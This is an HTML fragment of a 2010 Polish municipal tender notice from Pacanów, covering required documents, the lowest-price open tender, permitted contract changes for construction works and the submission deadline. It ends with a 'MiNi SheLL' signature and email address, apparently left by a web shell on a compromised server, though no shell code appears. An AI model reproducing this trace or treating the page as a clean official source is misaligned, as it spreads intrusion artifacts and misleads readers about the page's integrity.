<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-	formularz ofertowy,
-	wykaz części zamówienia, których realizację wykonawca zamierza powierzyć podwykonawcom (wg wzoru podanego w załączniku nr 12 do SIWZ).
-	dowód wniesienia wadium,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Ewentualne zmiany umowy dotyczyć mogą wyłącznie:
a)	zmiany terminów wykonania robót - w przypadku gdy o zmianę taką wystąpi Zamawiający, lub zmiana taka stanie się konieczna ze względu na okoliczności, których nie można było przewidzieć w chwili składania oferty (klęski żywiołowe, warunki atmosferyczne odbiegające od typowych dla pory roku, uniemożliwiające  prowadzenie robót budowlanych, błędy w dokumentacji  mające wpływ na realizację robót, wstrzymanie robót przez  Zamawiającego, opóźnienia wynikające z terminu przekazania placu budowy).
b)	zmiany osób lub podmiotów odpowiedzialnych za wykonywanie zadania ze strony Wykonawcy  lub Zamawiającego - jeżeli zmiana taka nie wpłynie na pozostałe warunki realizacji umowy,
c)	zmiany zakresu robót  - jeżeli z wnioskiem takim wystąpi Zamawiający lub zmiana taka stanie się konieczna ze względu na okoliczności, których nie można było przewidzieć w chwili składania oferty,
d)	zmiany wynagrodzenia - jeżeli nastąpi zmiana zakresu umowy jak również w przypadku urzędowej zmiany wysokości stawki podatku VAT,
e)	wystąpienie zmian których konieczność wprowadzenia będzie  wynikała z wymagań instytucji  współfinansujących realizację przedmiotu umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.pacanow.pl/przetargi.php<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Pacanów, ul. Radziwiłłówka 2, 28-133 Pacanów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2010 godzina 11:00, miejsce: Ofertę należy złożyć w sekretariacie Urzędu Gminy w Pacanowie, ul. Radziwiłłówka 2, 28-133 Pacanów pok. nr 17, nie później niż do dnia19.08.2010r. do godz. 11.00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com